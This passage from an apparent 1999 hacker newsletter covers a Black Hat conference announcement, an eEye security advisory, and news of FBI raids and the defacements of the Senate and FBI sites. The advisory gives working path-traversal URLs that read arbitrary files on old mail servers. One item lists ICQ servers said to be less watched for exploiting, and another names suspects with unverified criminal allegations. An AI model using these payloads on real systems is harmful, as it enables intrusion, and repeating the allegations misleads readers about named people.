- the foreign students are affiliated with their countries' intelligence agencies.
-
- The report noted that DOE is preparing a counterintelligence plan that
- addresses these issues.
-
- @HWA
-
- 12.0 Black Hat Briefings Announced
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- contributed by Code Kid
- Come and meet the Hackers. Secure Computing has officially announced Black Hat '99
- the third annual meeting of the minds between security professionals, white and black
- hat hackers. (If you are deep in the Security business and can only go to one conference
- then this is it.) (And Microsoft is now a cosponsor, how ironic is that?)
-
- PR Newswire
- http://biz.yahoo.com/prnews/990525/ca_secure__1.html
-
- BlackHat
- http://www.blackhat.com/
-
- PR Newswire;
-
- Tuesday May 25, 8:45 am Eastern Time
-
- Company Press Release
-
- SOURCE: Secure Computing Corporation
-
- Secure Computing Corporation Announces Black Hat
- Briefings '99, Bringing Together Corporate and
- Government Experts, and Hackers to Address Y2K And Enterprise
- Security
-
- SAN JOSE, Calif., May 25 /PRNewswire/ -- Secure Computing (Nasdaq: SCUR - news) today
- announced that Secure Computing Black Hat Briefings '99, the exclusive security
- conference, will take place from July 7-8, 1999 at the Venetian Hotel on the Las Vegas
- Strip. This third annual conference brings corporate and government engineers and software
- programmers face-to-face with today's cutting edge computer security experts and
- ``underground'' security specialists for two days of intensive discussions on who's
- breaking in to computer networks, how they are doing it, how Y2K is affecting security,
- and what can be done to address this.
-
- The conference, with title sponsorship by Secure Computing, and lead sponsorship by
- Microsoft (Nasdaq: MSFT - news),National Computer Security Center, Counterpane Systems
- and Network Flight Recorders is designed to fill the need of computer professionals to
- better understand the security risks to their computer and information infrastructures by
- potential threats. To do this, Secure Computing assembles a group of vendor neutral
- security professionals at the same forum, where they will candidly discuss and debate the
- problems businesses face, and the solutions they see to those problems. Secure Computing
- Black Hat Briefings '99 is not for security dilettantes or marketers looking to hawk their
- vendors' wares -- just straight talk by people who make it their business to explore the
- ever-changing security space.
-
- Spanning two days the conference has three separate tracks, two focused at technical
- audiences with a third a new ``White Hat'' tract that is focused at CIO's, CEO's and other
- senior level people. Topics will include Y2K and what it means to system security, how to
- detect and repel attacks on a network, secure programming techniques and tool selection for
- creating and effectively monitoring secure networks. Secure Computing Black Hat Briefings
- '99 intense sessions will bring to light the security problems confronting organizations
- and network administrators, most of which go unnoticed by today's preoccupied
- system administrators who are often more worried about network growth, updates and Y2K
- problems.
-
- Running the conference is Jeff Moss, Director of Assessment Services at Secure Computing.
- Prior to joining Secure Computing, Moss was at Ernst & Young, LLP, where he was a manager
- in the Information Security Services (ISS) group. Moss also successfully owned and operated
- DEF CON Communications, a computer consulting company that focused on
- network security solutions.
-
- ``It is crucial that we continue to educate organizations on the risks they face daily.
- Network security breaches are real, and are costing organizations hundreds of millions of
- dollars every year,'' said Moss. ``The coming year will be crucial for organizations
- in regards to their network security. Taking a myopic approach only to the Y2K issue that
- does not involve diligent attention to security could lead to severe consequences. Being
- Y2K compliant really won't matter for much if an organization's network is rendered
- ineffective by hacker attacks and intrusions. That is why a forum like Secure Computing
- Black Hat Briefings '99 is so important in educating businesses and governments about the
- very real threats that are out there.''
-
- Presenters range from corporate and government security system managers to master hackers
- themselves, including Dr.Mudge, one of the prominent members of the hacker group
- 'The L0pht', who is responsible for numerous advisories and tools in use in both the black
- hat and white hat communities; Peter Shipley, who is well known and respected in the
- professional world as well as the underground and hacker community and whose specialties
- are third party penetration testing and firewall review, computer risk assessment, and
- security training; and Bruce Schneier, author of applied Cryptography and president of
- Counterpane Systems.
-
- More Information, and How to Register
-
- Detailed information on Secure Computing Black Hat Briefings '99, including a speaker's
- schedule, biographies of presenters, and information on how to register and reserve hotel
- rooms, can be found via the Secure Computing Web site (http://www.securecomputing.com )
- and by clicking on the Black Hat Briefings '99 icon.
-
- About Secure Computing
-
- Headquartered in San Jose, Calif., Secure Computing Corporation provides enterprise-wide
- network security solutions to a worldwide partner and customer base in financial services,
- telecom, aerospace, manufacturing, hi-tech, service providers and government agencies.
- More information is available over the Internet at www.securecomputing.com or by calling:
- in the U.S., 800-379-4944 or 408-918-6100; in Europe, 44-1753-826000; in Asia/Pacific,
- 61-2-9844-5440.
-
- NOTE: All registration and trademarks are proprietary to their respective owners
-
- From secure computing;
-
-
- The Black Hat Briefings '99, July
- 7-8th Las Vegas
- The Black Hat Briefings '99, July
- 7-8th Las Vegas
-
-
- It's late. You're in the office alone, catching up on database
- administration. Behind you, your network servers hum along quietly,
- reliably. Life is good. No one can get to your data or disrupt your
- WAN. The network is secure. Or is it?
-
- The Black Hat Briefings conference has been organized to put an end
- to concerns like these. While many conferences focus on information
- and network security, only The Black Hat Briefings will put your
- engineers and software programmers face-to-face with today's cutting
- edge computer security experts and "underground" security specialists.
- The "White Hat" track will inform your CEO or CIO with no-nonsense
- information about what issues to be aware of, and what they can ignore.
-
- Only the Black Hat Briefings conference will provide your people with
- the tools and understanding they need to help thwart those lurking either
- in the shadows of your firewall or the depths of your companies WAN.
- The reality is, they are out there. The choice is yours. You can live in
- fear of them. Or, you can learn from them.
-
- Conference Overview
-
- The Black Hat Briefings conference series was created to fill the need of computer
- professionals to better understand the security risks to their computer and information
- infrastructures by potential threats. To do this we assemble a group of vendor neutral
- security professionals in the same room and let them talk candidly about the problems
- businesses face, and the solutions they see to those problems. No gimmicks, just
- straight talk by people who make it their business to explore the ever changing security
- space.
-
- Spanning two days with three separate tracks, The Black Hat Briefings will focus
- on the vital security issues facing organizations with large Enterprise networks and
- mixed network operating systems. Topics will Include Intrusion Detection Systems
- (IDS), Computer Forensics (CF) systems, Incident Response, secure programming
- techniques and tool selection for creating and effectively monitoring your networks. You
- will be put face to face with the people developing the tools used by and against
- hackers.
-
- This year the Black Hat Briefings has grown to include a separate track specifically
- designed for the CEO and CIO. This third track, nick named the "White Hat" track,
- was developed by the National Computer Security Center (NCSC) of the
- National Security Agency. While the other tracks have a technology focus, this track
- is for people who have to manage it. What should you look for when hiring an outside
- security consultant? Should you even look outside your organization?
-
- The Black Hat Briefing's intense sessions will bring to light the security and
- mis-configuration problems confronting organizations and network administrators, most
- of which go unnoticed by today's preoccupied system administrators where security
- gets put off in lieu of constant network growth and upgrades. Our speakers will discuss
- the strategies involved in correcting existing problems and speak towards what you can
- expect in the future.
-
- This year you can expect more visual demonstrations, more speakers who are
- authoritative in their fields, and as always an excellent time.
-
- As an added bonus, people who attend The Black Hat Briefings get free admission to
- DEF CON 7.0, the largest Hacker convention in the US, held right after Black Hat in Las
- Vegas. For more information see their web site.
-
- Who is this conference for?
-
- CEOs and CIOs, MIS and IT managers as well as the people doing the work. Basically
- anyone dealing with the security functions at your company looking for deep insight into
- the security space.
-
- Registration Costs
- Registration costs are $995 US before June 14th 1999
- Late registration fees are $1,195 after June 14th.
- You may cancel your registration before July 1st for a full refund.
- This fee includes two days of speaking, materials, a reception, and meals.
- To register, please use the button on the left hand side of this page.
-
- We have excellent rates at the Venetian Hotel! Do not be discourage by its
- splendor!
-
- Discount Airfare
-
- We've got great discounts on airfare from Montrose Travel, who book bulk air travel. If you need
- to still book airline tickets please give Montrose a call first.
-
- Montrose Travel 1-800-301-9673
- http://www.montrosetravel.com
-
- They currently have deals for Black Hatattendees from the US and International on the following
- airlines:
-
- America West Southwest Delta
- American Southwest Airlines United Airlines
-
- and other smaller carriers and even International Airfare rates.
-
- Expect rates lower than published. When calling make sure you refer to The Black Hat Briefings as
- the group name.
-
-
-
- 13.0 eEYe Digital Security advisory: Multiple Web Interface Security Holes
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
-
- Multiple Web Interface Security Holes
- Systems Affected
- CMail 2.3
- FTGate 2,1,2,1
- NTMail 4.20
-
- Release Date
- May 26, 1999
-
- Advisory Code
- AD05261999
-
- Description:
-
- The following holes were found while testing Retina against a few various
- services that have web based interfaces. The holes are nothing amazing just
- common amongst many web based interfaces. We are sure some other software
- will be found with similar holes... if you come across some contact
- info@eeye.com and let us know.
-
- ---> CMail
-
- The default location of the web based interface for CMail is C:\Program
- Files\Computalynx\CMail Server\pages\. It is a simple hole. For example if
- we were to load http://[server]:8002/../spool/username/mail.txt in our web
- browser we would be looking at the email for that user. Note: Mail.txt is
- not the real mail file. There is one minor problem... reading of files is
- not totally straight forward. It seems CMail has some mechanism of what it
- will read or not. If you have a text file with no carriage returns in it
- CMail will not read it. There also exists multiple buffer overflows within
- the various SMTP and POP server functions of CMail. Yes they are
- exploitable. >:-]
-
- ---> FTGate
-
- Same as above basically. http://[server]:8080/../newuser.txt The only
- difference is that FTGate doesn't seem to mind if the file has the carriage
- returns or not.
-
- ---> NTMail
-
- NTMail suffers from the same programming flaw...
- http://[server]:8000/../../../../../boot.ini.
-
- There is other server software out there that suffers from these common
- holes. An average of 65% of the software we have tested thus far has had
- problems with restricting the path that they allow. NTMail as well as the
- other two can be run as a service, NTMail does it by default, therefore you
- can read files as SYSTEM on most of them.
-
- Fixes
-
- Disable the web interfaces where applicable until the vendors release
- patches.
-
- Vendor Status
-
- All vendors have been notified.
-
- Copyright (c) 1999 eEye Digital Security Team
- Permission is hereby granted for the redistribution of this alert
- electronically. It is not to be edited in any way without express consent of
- eEye. If you wish to reprint the whole or any part of this alert in any
- other medium excluding electronic medium, please e-mail alert@eEye.com for
- permission.
-
- Disclaimer:
-
- The information within this paper may change without notice. Use of this
- information constitutes acceptance for use in an AS IS condition. There are
- NO warranties with regard to this information. In no event shall the author
- be liable for any damages whatsoever arising out of or in connection with
- the use or spread of this information. Any use of this information is at the
- user's own risk.
-
- Please send suggestions, updates, and comments to:
-
- eEye Digital Security Team
-
- info@eEye.com
- http://www.eEye.com
-
-
- @HWA
-
- 14.0 Fun with ICQ
- ~~~~~~~~~~~~
-
- Just stumbled across this site in my travels, has some interesting info check
- 'em out....
-
- From http://home.earthlink.net/~childzplay/comp.html
-
- Although Miribalis says they do not recommend using 99a yet, I've been using
- it for about 1 month and haven't had any trouble with it. Some other people I
- know have not been so lucky. I guess it is a use at your own risk deal until they
- officially release the 99a final version.
-
- If you didn't know, the server that comes as default in v.99a is watched closely
- by Miribalis. Therefore, if you want to go on an exploit journey, I would suggest
- connecting up to a more stable, and less watched server. Here are some for your
- entertainment:
-
- Mirabilis.com 4000,
- ICQMirabilis.com 4000,
- icq.mirabilis.com 4000,
- icq0.mirabilis.com 4000,
- icq1.mirabilis.com 4000,
- icq2.mirabilis.com 4000,
- icq3.mirabilis.com 4000,
- icq4.mirabilis.com 4000,
- icq5.mirabilis.com 4000,
- icq.lmirabilis.com 4000,
- 38.151.231.40 4000,
- 38.161.231.4 4000,
- 38.161.231.40 4000,
- 38.161.231.41 4000,
- 38.161.231.44 4000,
- 38.161.231.45 4000,
- 38.161.231.49 4000,
- 38.161.232.40 4000,
- 38.161.232.44 4000,
- 38.161.232.45 4000,
- 104.99.113.49 4000,
- 105.99.113.49 4000,
- 202.68.84.41 4000,
- 204.91.242.25 4000,
- 204.91.242.35 4000,
- 204.91.242.44 4000,
- 204.91.242.112 4000,
- 204.91.243.90 4000,
- 204.91.243.113 4000,
- 204.91.243.115 4000,
- 207.95.232.2 4000,
- 208.21.43.40 4000,
- 208.21.43.50 4000,
- 208.22.84.41 4000,
- 208.161.231.40 4000,
- 208.202.84.11 4000,
- 208.202.84.21 4000,
- 208.202.84.41 4000,
- 208.204.84.41 4000,
- 208.208.82.41 4000,
- 208.208.84.41 4000,
- 208.215.43.40 4000,
- 208.215.43.41 4000,
- 208.215.43.50 4000,
- 208.215.43.50 4000,
- 208.215.43.77 4000,
- 208.215.43.90 4000,
- 208.315.43.50 4000,
- 209.83.180.44 4000,
- 209.83.180.45 4000,
- 209.91.242.25 4000,
- 209.91.242.35 4000
-
- @HWA
-
-
-
- 15.0 FBI raids suspected hackers
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- Received: by hackernews (mbox contact) (with Cubic Circle's
- cucipop (v1.31 1998/05/13) Thu May 27 15:40:08 1999)
- X-From_: [deleted]@hotmail.com Wed May 26 16:20:14 1999
- Delivered-To: submit@hackernews.com
- Received: from hotmail.com (law2-f208.hotmail.com
- [216.32.XXX.XXX])
- by hackernews.com (Postfix) with SMTP id A87D4469F for
- ; Wed, 26 May 1999 16:20:13 -0500 (EST)
- Received: (qmail 39781 invoked by uid 0); 26 May 1999 21:23:12
- -0000
- Message-ID: <1999052621.39780.qmail@hotmail.com>
- Received: from 192.116.XXX.XXX by www.hotmail.com with HTTP;
- Wed, 26 May 1999 14:23:11 PDT
- X-Originating-IP: [192.116.XXX.XXX]
- From: "[deleted]" <[deleted]@hotmail.com>
- To: submit@hackernews.com
- Subject: www.fbi.gov IS DEAD
- Date: Wed, 26 May 1999 21:23:11 GMT
- Mime-Version: 1.0
- Content-type: text/plain; format=flowed;
- Return-Path:
-
- Date: 5/26/99 17:23
- Received: 5/27/99 16:48
- From: [deleted]@hotmail.com
- To: submit@hackernews.com
-
- FBI WILL NOT FUCKIN WITH MY FRIENDS FROM GLOBAL HELL (gH)
-
-
- www.fbi.gov IS DEAD
-
- im the Israeli ghost and yes i am from israel
-
- the fbi will stop hunting hackers
-
- gangsters dont dance we boggy
-
- today is the 25.5.99 israeli time is : 00:22
-
- www.fbi.gov will stay down all day !
-
-
- the Israeli Ghost
-
-
- _______________________________________________________________
- Get Free Email and Do More On The Web. Visit http://www.msn.com
-
-
- FBI Raids Suspected Crackers.
-
- contributed by darkscent
- It is often difficult to separate the fact from the fiction,
- rumors, supposition, and unsubstantiated allegations
- that fly around the net when big news breaks. This is
- what HNN has been able to verify so far. Yesterday
- morning at aprox 6:00 am CST the FBI executed nine
- search warrants in Houston, Seattle and various
- California locations. HNN believes that some of those
- who where raided where iCBM, MostHated, loophole,
- Spaceg0at, soulblazer, fryz, vallah and Cl0pz. HNN has
- not learned of any arrests that have been made. While
- the FBI has not revealed why the search warrants were
- executed it is believed to have some relation to the
- recent crack of whitehouse.gov. HNN has received no
- confirmation of Most Wanted lists or FBI Directives,
- rumors of which have been floating around the net.
-
- MSNBC
- http://www.msnbc.com/news/273819.asp
-
- In response to the recent raids several other members
- of gH (Global Hell) as well as other groups such as Team
- spl0it have attacked numerous web sites, (estimates
- range from between 40 and 100). The FBI has admitted
- to receiving a major Denial of Service attack, and the
- US Senate web site was defaced for a few minutes. In
- an interview with MSNBC MostHated said "The
- retaliation has to stop." HNN received an email from
- "Israeli Ghost" claiming responsibility for the FBI DoS
- attack. HNN was also able to snag the US Senate web
- page defacement before it was restored.
-
- Nando Times
- http://www.techserver.com/story/body/0,1634,53692-86005-610419-0,00.html
-
- CNN
- http://www.cnn.com/TECH/computing/9905/27/senate.hackers/
-
- C|Net
- http://www.news.com/News/Item/0,4,37138,00.html?owv
-
- Israeli Ghost Email
- http://www.hackernews.com/orig/ghost.html
-
- HNN Cracked Pages Archive
- http://www.hackernews.com/archive/crackarch.html
-
- Last week, a gH member Zyklon (Eric Burns), was
- indicted in connection with three separate attacks on
- Virginia area systems owned by Computer Tech
- Services, Issue Dynamics, and Electric Press which
- housed the web site of the United States Information
- Agency. The Seattle Times has run a biographical piece
- on Zyklon. The story has quotes from his classmates
- and parents.
-
- Seattle Times
- http://www.seattletimes.com/news/local/html98/hack_19990525.html
-
- Zyklon's Indictment
- http://www.hackernews.com/orig/zyklon.html
-
-
- MSNBC:
-
- Feds vs. hackers: The battle widens
- FBI and Senate shut down Web sites after a series of attacks;
- skirmishes waged with search warrants and Internet sieges
- By Brock Meeks, Alan Boyle and Bob Sullivan
- MSNBC
-
-
-
-
- May 28 Computer attacks on the FBI and U.S.
- Senate Web sites are leading to a broader
- criminal investigation into such intrusions,
- officials indicated Friday. The latest skirmish
- between federal authorities and Web site
- attackers began Wednesday with FBI raids on
- purported members of a group called gH, or
- Global Hell, in at least three states and has
- continued with a protest campaign targeting a
- wide spectrum of Internet sites.
-
-
- THE FBI and Senate Web sites remained inaccessible
- Friday as a result of the computer attacks. The FBI shut
- down its Web site Wednesday after it was swamped by a
- denial-of-service attack.
- The Senate took its site offline Thursday night after
- attackers broke into the public computer server and
- replaced the congressional bodyÆs home page with a screed
- against the FBI.
- The hacked page claimed credit on behalf of a group
- known as the Masters of Downloading, or M0D ù and
- denigrated the FBI as well as Global Hell.
- ôThe FBI may be all over the other groups like ... gH
- and tK. ... M0D make those morons look like a group of
- special-ed students! FBI vs. M0D in Æ99, bring it on!ö read
- the page, which was peppered with ruder comments and
- hacker lingo.
- The intrusion ôcompromised our Senate Internet Web
- site, and as a result the Senate has taken down our Web
- page to do some investigation,ö said Sherry Little, a
- spokeswoman for the Senate sergeant-at-arms, who
- manages the site.
- She said FBI agents were heading up the investigation.
- ôTheyÆre looking at the criminal aspects of it,ö she told
- MSNBC. ôTheyÆre in charge of the investigation, in that
- theyÆre trying to determine where it came from and whether
- there was any connection at all to any incidents that theyÆve
- explored in the past.ö
- The Web outage rendered the official home pages of all
- 100 senators and senatorial committees inaccessible, but
- e-mail and other computer services not related to the public
- Web site were unaffected, Little said.
- System administrators for the FBI and the Senate Web
- sites were beefing up site security during the down time ù
- and no one could say exactly when the sites would be
- returned to service. ôWeÆre not expecting this to be a
- long-term problem,ö Little said.
- The FBI was continuing its investigation into the attack
- on its own Web site, said Dave Miller, a media
- representative at the bureauÆs national office. He confirmed
- that ôthis could result in criminal penalties.ö
- Although he declined to provide specifics on the
- investigation, Miller told MSNBC that ôit would be a logical
- pointö that the FBI would look for connections to past
- attacks on federal Web sites.
- Earlier this month, Global Hell was implicated in
- attacks on a variety of U.S. government sites, including sites
- for the White House, several Cabinet departments and the
- U.S. Information Agency. Last week, Global Hell member
- Eric Burns (who also goes by the name Zyklon), was
- arrested in connection with three attacks on government
- computers.
- Members of Global Hell reported that law-enforcement
- officials served search warrants early Wednesday in Seattle,
- Houston and California.
- In Houston, FBI spokesman Rolando Moss told
- MSNBC that agents were investigating ôallegations of
- computer intrusionsö involving a teen-ager who uses the
- hacker handle ôMosthated.ö He said the investigation was
- continuing and declined further comment.
- In telephone conversations with MSNBC, Mosthated
- said that his home was raided at about 6 a.m. CT
- Wednesday, and that family computer equipment was
- confiscated. He said his parents were ôreally mad. ... The
- computer had all their financial information and stuff on it.ö
- MosthatedÆs mother got on the line to read from the FBIÆs
- receipt for the equipment and confirm that she was ôreally
- mad.ö
- Mosthated said at least eight other people around the
- country had been served with search warrants as part of ôa
- huge hacker crackdown.ö Four other Houston-area
- hackers, three in California and one in Seattle reportedly
- received FBI visits. None was arrested, but all had
- computer equipment confiscated, he said.
- An FBI representative in San Diego said she could not
- comment on the investigation because the paperwork was
- sealed. Inquiries with the bureauÆs Seattle office met with a
- similar response: ôRight now there are still things that need
- to be decided,ö one agent told MSNBC on condition of
- anonymity.
-
-
- White House Web site shut down
-
- The bureauÆs Web site went out of service only hours
- after the raids.
- According to AntiOnline, a computer security site, an
- individual calling himself Israeli Ghost was taking credit for
- the attack on the FBIÆs site.
- ôFBI will not (profanity deleted) with my friends from
- Global Hell,ö the hacker allegedly wrote in an e-mail to
- AntiOnline.
- Other members of the hacking community, contacted
- by MSNBC, said the FBI site was hit by whatÆs called a
- denial-of-service attack. In such an attack, the host
- computer is not actually controlled by an outsider; rather,
- outsiders bombard a Web site with so many simultaneous
- hits that it becomes overwhelmed and can no longer
- function.
- Mosthated said he didnÆt know who was responsible
- for the denial-of-service attack. The FBI did ask some
- cursory questions about this monthÆs attack on the White
- House Web site. He said he was shown printouts of Web
- stories about the incident from MSNBC and CNN. ôBut
- they didnÆt really push those questions,ö Mosthated said.
-
-
- As the day went on, other Web sites ù none of which
- had any apparent connection to the FBI ù were defaced.
- A correspondent claiming to be a Global Hell member
- called Infamous sent an e-mail message to MSNBC
- Wednesday night criticizing the FBI and saying he ôdefaced
- over 40 web domains today to state my opinion.ö The
- writerÆs identity could not be confirmed, however.
-
- æTHIS NEEDS TO STOPÆ
- The response to the raids has spread through the digital
- underground and taken on a life of its own, a spontaneous
- act of retaliation that wasnÆt asked for.
- ôThe retaliation has to stop,ö Mosthated said. ôAll this
- ... needs to stop. Have you seen all the Web pages that
- have been changed in the last hour? Someone told me that
- thereÆs been more than a hundred,ö he said.
- ôThis (retaliation) is just going to look worse on the
- people that did get raided,ö said the 18-year-old
- Mosthated, who says he stopped hacking last summer to
- set up his own security firm.
- This impromptu show of support is going to backfire,
- he told MSNBC. ôEverything that gH has done is going to
- be put on my shoulders,ö owing to his position as the
- groupÆs founder.
- The FBI agents who executed a search warrant on
- Mosthated said they were looking for evidence related to
- ôillegal telecom activity,ö he said, in particular illegally set-up
- conference calls. ôThe FBI told me some company lost
- $250,000 because of the illegal conference calling activity,ö
- he said.
- Mosthated and other sources indicated that the FBI
- appeared to be targeting other figures prominent in the
- hacker community. AntiOnline published a list of almost 100
- computer handles, purportedly taken from directives sent by
- the FBI to Internet service providers.
-
- Seattle Times;
-
- Posted at 12:02 p.m. PDT; Tuesday, May 25, 1999
-
- Suspect was star hacker on the
- Internet but shy and lonely in real life
-
- by Roberto Sanchez
- Seattle Times staff reporter
-
- In the world of computers, he was Zyklon, the
- aggressive "cracker" named after a poison gas,
- who had the skill to break into the Web sites
- of movie studios, universities and even the
- Chinese government.
-
- But on the other side of the monitor -
- according to federal prosecutors - Zyklon was
- really Eric Burns, a lanky, shy, 19-year-old, a
- former student at Shorewood High School with few friends,
- several run-ins with the law, and an unhealthy obsession with a
- woman who didn't know anything about him.
-
- Burns last week was indicted by a federal grand jury in
- Alexandria, Va., on three counts of computer intrusion.
- Prosecutors say Burns broke into hundreds of Web pages,
- altered files and caused thousands of dollars in damage. They say
- he often left behind text taunting his victims and professing his
- unrequited love for the woman, a former high-school classmate.
-
- Burns lives in Shoreline. But he was indicted in the Washington,
- D.C., suburb because that's where the compromised computer
- systems are located.
-
- Burns and his parents, Alice and Edward, did not return calls for
- comment. His lawyer, Ralph Hurvitz, advised his client not to give
- interviews. He said Burns will plead not guilty.
-
- Acquaintances of Burns - who also took classes at Shoreline
- Community College last year - describe him as the stereotypical
- computer nerd: shy, didn't talk to many people, had few friends
- and spent much of his time on the computer.
-
- "He was very smart, one of the smartest kids I know," said David
- Thompson, a member of Shorewood's class of 1998. "Eric knew
- and knows so much about computers. He's kind of a freak that
- way."
-
- Even the woman, whom Burns idolized in practically every Web
- site he hacked, said she had never talked to or been personally
- approached by Burns.
-
- "I didn't know who he was or what he did," she said.
-
- She said she took one law class with him her senior year of high
- school. After that, she began to receive letters from him, then gifts.
- Court records say she received a crystal bell and a diamond
- necklace, which her family returned.
-
- "Halfway through my senior year, someone called my house and
- told me to look up this (Web) address" for some of his
- handiwork, the woman said. She never did.
-
- She said she didn't go to the police or seek a restraining order
- because Burns didn't seem dangerous.
-
- "He never did anything to threaten me," she said.
-
- A former friend said Burns had a mean side, which he often
- expressed in his hacking and "cracking" - the term for breaking
- into Web sites.
-
- "He was into it for the power," said Eric Lindvall, a former student
- at Shorewood who was a friend of Burns' in 1994. He said he,
- Burns and two other students spent much of their free time
- together, breaking into computer or phone systems, getting access
- to credit-card numbers and phone accounts.
-
- Lindvall said he and Burns actually got caught by FBI agents in
- 1994 when they used a stolen credit-card number to buy
- computer equipment. They were not prosecuted, and he said he
- stopped spending time with Burns after that.
-
- Lindvall also said Burns and two other students were arrested in
- 1996 for allegedly using stolen credit-card numbers to buy
- computer gear, then reselling it to stores or individuals. Again,
- Burns was not prosecuted, he said..
-
- An affidavit filed by the U.S. Attorney said Burns bragged online
- to an acquaintance about getting caught for credit fraud as a
- minor. The Shoreline Week, a community newspaper, published a
- story Oct. 2, 1996, about three Shoreline teens arrested for credit
- fraud.
-
- Whatever popularity Burns lacked in the real word, he made up
- for on the Internet. His alleged exploits were regularly featured in
- Web sites dedicated to computer hacking. Some people even
- admired him; a cracker who defaced the University of
- Washington's engineering Web site in April dedicated the deed to
- Zyklon.
-
- Zyklon apparently took his name from the gas used by Nazi
- Germany to exterminate Jews.
-
- Burns will be arraigned on June 14. If guilty, he faces up to 15
- years in prison.
-
- Roberto Sanchez's phone message number is 206-464-8522.
-
-
-
- Copyright ⌐ 1999 Seattle Times Company
-
- @HWA
-
- 15.1 Real life hacker wargames
- ~~~~~~~~~~~~~~~~~~~~~~~~~
-
- RAIDED HACKERS
- by BHZ, Friday 28th May 1999 on 6.32 pm CET
- Our new Special Report talks about recent hackers versus Govenment, and FBI
- versus hackers relations. White House was hacked, US Senate was hacked but
- several hackers have been found. Read the article Real hacker war-games.
-
- Real hacker war-games
-
- Recently hackers became more and more active. US government and Universities
- are keep being hacked. Even the official White House site (www.whitehouse.gov) was
- hacked, and replaced with anti-Clinton messages and pictures. Government struck.
- Eric Burns aka Zyklon, a gH member was caught and indicted on the count of several
- break-ins. His name was also mentioned in "greetz" area of hacked White House
- site, so he was questioned about it too. Zyklon, 19 year old, could get up to 15 years
- of imprisonment. His fellow hackers from gH hacked in revenge several domains
- with messages of protest against the Government. MAST3RZ 0F D0WNL0ADING
- earlier today hacked the official US Senate site (www.senate.gov), and wrote about
- battle against FBI and US government. FBI site (www.fbi.gov) was under big DoS
- (denial of service) attack, and the "attacker" mailed HNN about it (read his mail in
- HNN Buffer Overflow section).
- Today AntiOnline and HNN published more details of hackers raided by FBI 2 days ago.
- HNN wrote that :"some of those who where raided where iCBM, MostHated, loophole,
- soulblazer, fryz, vallah and Cl0pz". We found out that following hackers were too involved
- in this FBI actions:
-
- - Zyklon (he is found and indicted)
- - Spacegoat (already found)
- - Spade (already found)
- - Overfien (still looking for him)
- - Rottenboy (still looking for him)
- - Hybrid (still looking for him)
- - Sketch (still looking for him)
- - Lord Omino (still looking for him)
-
- The crew from Channel 12 did a background check on the hackers and their supposed crimes.
-
- - Rottenboy aka PowerDragon is wanted for telecommunications fraud
-
- - Gino Ramano is also wanted for telecommunications fraud
-
- - Lord Omino aka moviesmith is too wanted for telecommunications fraud
-
- - Overfien is suspected in:
-
- 1.hacking various subnets for the hacker group GH
- 2.hacking mit.edu, zapnow.com, wwu.edu, washington.edu
- 3.cracking into syprnet (governments classified network)
- 4.leaving 221 computers infilitrated with the words "overfien wuz here"
- 5.wanted in oregon for western union fraud "$60,000"
- 6.also possible accounts of forger and theft
-
- - Sketch aka mode is wanted for telecommunications fraud
-
- - Grip aka JF is wanted for hacking
-
- - loophole aka Elaich is also wanted for hacking
-
- - Hybrid is wanted for telecommunications fraud
-
-
- BHZ
- for Help Net Security
- http://net-security.org
-
- @HWA
-
- 16.0 MOD hacks Senate site
- ~~~~~~~~~~~~~~~~~~~~~
- From http://www.maximumpcmag.com/
- 05.28.99 11:53
-
- Hackers Add Senate To Victims
-
- Hackers have added the U.S. Senate's main page to their list of owned
- web sites in an escalating war between the FBI and "crackers" around
- the globe.
-
- Hackers defaced the main page for the Senate late Thursday
- leaving the message: "The FBI may be all over the other groupz, like
- those gH and tK queerz, cl00bagz gal0re. M0D make th0se m0ronz l00k
- like a gr0up of special-ed st00dentz!@# FBI vs. M0D in '99, BR1NG IT
- 0N FUQRZ! (BTW NIPC IZ ALS0 0WNED)."
-
- Members of the MOD group told security site, Antionline, that they
- gained access to another computer on the Senate's network, installed a
- sniffer, and swiped the administrators passwords. On Friday, the
- Senate's page was still down but a mirror of the hacked site was kept on
- Antionline.
-
- On Wednesday, an attack on the FBI's main page spooked the agency
- enough to take down its main page. The FBI's page also remained down
- Friday morning.
-
- Related Story: FBI Site Attacked
-
-
-
- FBI Site Attacked
-
- The latest victim in a skirmish between hackers and the FBI may have been
- the brown-shoes own web site.
-
- The FBI's main web page remained offline Thursday afternoon while the Bureau
- checked it for security intrusions. The FBI reportedly took the page down
- Wednesday after someone attempted to hack it.
-
- The skirmish apparently began Wednesday morning when FBI agents in
- the Houston office raided the homes of hackers who allegedly belonged
- to a group called "gH." Agents did not arrest anyone but confiscated
- computers of numerous people.
-
- According to security news site, antionline.com, the FBI has also directed
- numerous ISPs to preserve backup tapes, logs, e-mail, and IRC
- conversations for about thirty individuals suspected of being hackers.
-
- Nando Times;
-
- Hackers take down FBI and Senate Internet sites
-
- Copyright ⌐ 1999 Nando Media
- Copyright ⌐ 1999 Associated Press
-
- By TED BRIDIS
-
- WASHINGTON (May 28, 1999 12:04 a.m. EDT http://www.nandotimes.com) - Computer hackers
- continued a series of electronic attacks against Internet sites of federal agencies on Thursday, defacing the
- Web page for the U.S. Senate before it was taken down.
-
- The Web site for the FBI also remained inaccessible late Thursday, a day after the agency said hackers tried
- unsuccessfully to compromise it. It was unclear when the FBI site might be made available again.
-
- "There was an attempt (Wednesday) by unknown persons to unlawfully gain access to the FBI.Gov Web site,"
- according to a statement Thursday from the agency. "It was unsuccessful; however, as a precaution, the FBI
- shut down the site and is now taking additional steps to further insulate it."
-
- An obscene message left briefly on the Senate's Web site Thursday blamed the attack on what it said was the
- FBI's harassment of specific hacker groups, including the group that took credit for breaking into the White
- House site earlier this month.
-
- "Who laughs last? ...," the message said, adding that the intent was to send a monition "... to our friends at the
- FBI."
-
- Other federal Web sites, including those for the White House and the House of Representatives, appeared to
- be operating normally late Thursday.
-
- MSNBC reported that the attacks stemmed from the FBI's executing a search warrant on the home of a
- prominent hacker in Houston, Texas.
-
- FBI spokesman Rolando Moss confirmed that agents were investigating allegations of computer intrusions
- involving the Houston hacker. The FBI executed four search warrants that remained sealed, Moss said.
-
- Earlier this month, a grand jury in northern Virginia indicted Eric Burns, 19, on three counts of computer
- intrusion. Burns is reportedly known on the Internet as "Zyklon" and believed to be a member of the group that
- claimed responsibility for the attacks on the White House and the Senate sites.
-
- Federal prosecutors accused Burns of breaking into a computer between August 1998 and January 1999 in
- northern Virginia that is used by the U.S. Information Agency.
-
- "Zyklon" was one of a dozen names listed on the hacked version of the White House Web site, which was
